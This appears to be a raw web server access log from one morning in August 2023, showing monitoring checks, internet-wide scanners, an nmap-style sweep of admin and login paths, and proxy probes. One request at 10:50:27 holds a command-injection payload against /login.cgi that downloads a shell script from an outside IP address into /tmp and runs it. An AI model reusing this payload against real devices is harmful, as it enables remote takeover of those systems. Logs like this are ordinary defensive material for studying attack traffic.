176.58.105.240 - - [04/Aug/2023:10:19:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.11.51 - - [04/Aug/2023:10:21:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.11.4 - - [04/Aug/2023:10:22:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.221.140.120 - - [04/Aug/2023:10:24:19 +0200] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Aug/2023:10:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.221.140.120 - - [04/Aug/2023:10:25:37 +0200] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Aug/2023:10:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.14.26.208 - - [04/Aug/2023:10:25:53 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:28:12 +0200] "" 501 315 "-" "-"
176.58.105.159 - - [04/Aug/2023:10:28:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
176.58.105.159 - - [04/Aug/2023:10:28:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
176.58.105.159 - - [04/Aug/2023:10:28:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
176.58.105.159 - - [04/Aug/2023:10:28:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.132.41.70 - - [04/Aug/2023:10:28:45 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.93.240.144 - - [04/Aug/2023:10:29:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:10:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.159.212.145 - - [04/Aug/2023:10:30:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
85.159.212.145 - - [04/Aug/2023:10:30:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.159.212.145 - - [04/Aug/2023:10:30:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.159.212.145 - - [04/Aug/2023:10:30:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.216.150.4 - - [04/Aug/2023:10:30:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Aug/2023:10:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.2.234 - - [04/Aug/2023:10:31:14 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.150.147 - - [04/Aug/2023:10:32:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Aug/2023:10:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:33:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.128.205 - - [04/Aug/2023:10:36:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:10:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:37:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:39:22 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Aug/2023:10:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.58.112.199 - - [04/Aug/2023:10:40:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
176.58.112.199 - - [04/Aug/2023:10:40:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
176.58.112.199 - - [04/Aug/2023:10:40:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
176.58.112.199 - - [04/Aug/2023:10:40:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:41:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:43:41 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Aug/2023:10:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.98.136.128 - - [04/Aug/2023:10:45:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:10:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.151.146 - - [04/Aug/2023:10:46:41 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Aug/2023:10:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:47:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:49:08 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Aug/2023:10:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.46.18.1 - - [04/Aug/2023:10:50:27 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [04/Aug/2023:10:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:52:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:54:34 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Aug/2023:10:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:10:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:10:58:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:10:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.216 - - [04/Aug/2023:10:59:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.216 - - [04/Aug/2023:10:59:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.216 - - [04/Aug/2023:10:59:03 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.216 - - [04/Aug/2023:10:59:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Aug/2023:10:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:11:00:23 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Aug/2023:11:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.128.12 - - [04/Aug/2023:11:01:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:11:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:11:04:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:11:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.54.51.12 - - [04/Aug/2023:11:05:36 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
18.132.41.70 - - [04/Aug/2023:11:05:45 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Aug/2023:11:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /q5Dr HTTP/1.1" 404 309 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /admin.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /nmaplowercheck1691140024 HTTP/1.1" 404 329 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:04 +0200] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.54.0" 178-79-139-171.ip.linodeusercontent.com - - [04/Aug/2023:11:07:04 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /index.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /default.asp HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /admin.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:05 +0200] "GET /localstart.shtml HTTP/1.1" 404 321 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /indice.pl HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /menu.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /base.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /default.php HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /admin.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /inicio.jsa HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:06 +0200] "GET /main.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:07 +0200] "GET /admin.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:07 +0200] "GET /admin.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:07 +0200] "GET /main.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:07 +0200] "GET /admin.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:07 +0200] "GET /menu.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:07 +0200] "GET /menu.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /base.inc HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /index.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /home.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /admin.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /index.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /start.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:08 +0200] "GET /admin.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:09 +0200] "GET /menu.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:09 +0200] "GET /default.aspx HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:09 +0200] "GET /start.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:09 +0200] "GET /base.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:09 +0200] "GET /main.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:09 +0200] "GET /main.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /localstart.cfm HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /base.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /localstart.aspx HTTP/1.1" 404 320 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /home.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /base.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /inicio.html HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:10 +0200] "GET /base.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /base.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /default.cgi HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /base.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /home.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /base.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /base.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:11 +0200] "GET /base.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:12 +0200] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:12 +0200] "GET /admin.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:12 +0200] "GET /indice.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:12 +0200] "GET /indice.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:12 +0200] "GET /inicio.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:12 +0200] "GET /indice.jhtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /menu.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /start.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /inicio.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /start.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /indice.html HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:13 +0200] "GET /indice.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /index.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /indice.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /indice.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /indice.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /home.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
178.79.139.171 - - [04/Aug/2023:11:07:14 +0200] "GET /inicio.pl HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:15 +0200] "GET /inicio.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:15 +0200] "GET /inicio.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:15 +0200] "GET default.asp HTTP/1.1" 400 333 "-" "curl/7.54.0"
178.79.139.171 - - [04/Aug/2023:11:07:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.139.171 - - [04/Aug/2023:11:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2023:11:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:11:09:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:11:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.41.70 - - [04/Aug/2023:11:11:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
104.219.232.122 - - [04/Aug/2023:11:11:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
